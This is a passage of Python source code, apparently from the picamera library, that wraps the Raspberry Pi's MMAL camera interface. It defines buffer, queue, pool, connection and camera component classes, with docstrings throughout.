}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
        * ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
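    # Example (sketch): the two duplication strategies side by side
    # (`a` and `b` are hypothetical MMALBuffer instances):
    #
    #     a.replicate(b)   # fast: a and b share b's data block
    #     a.copy_from(b)   # slow: a gets an independent copy of b's data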
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
            mmal.mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
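    # Example (sketch): draining a queue without blocking (`q` is a
    # hypothetical MMALQueue):
    #
    #     while True:
    #         buf = q.get(block=False)
    #         if buf is None:
    #             break
    #         try:
    #             print(buf)
    #         finally:
    #             buf.release()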
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
        available (for the given values of *block* and *timeout*),
        :exc:`~picamera.PiCameraMMALError` is raised.
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
        they do in :meth:`get_buffer`. If no buffer is available (for the
        given values of *block* and *timeout*),
        :exc:`~picamera.PiCameraMMALError` is raised.
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
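    # Example (sketch): priming an enabled output port with every buffer in
    # its pool so the component can start producing output (`pool` and
    # `port` are hypothetical):
    #
    #     pool.send_all_buffers(port, block=False)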
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
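# Example (sketch): wiring a camera still port to the image encoder defined
# below; the encoder's output port would then be enabled with a callback to
# receive the encoded data (`image_callback` is hypothetical, error handling
# omitted):
#
#     camera = MMALCamera()
#     encoder = MMALImageEncoder()
#     conn = camera.outputs[2].connect(encoder.inputs[0])
#     conn.enable()
#     encoder.outputs[0].enable(image_callback)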
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
    .. _raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V4_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
    single input that connects to an upstream source port. This is an abstract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
            return self.inputs[0].connect(source, **options)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
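    # Example (sketch): component-level connection; the splitter picks the
    # first free output port of the camera (both objects hypothetical):
    #
    #     splitter = MMALSplitter()
    #     splitter.connect(camera)
    #     splitter.enable()  # also enables the underlying connection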
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
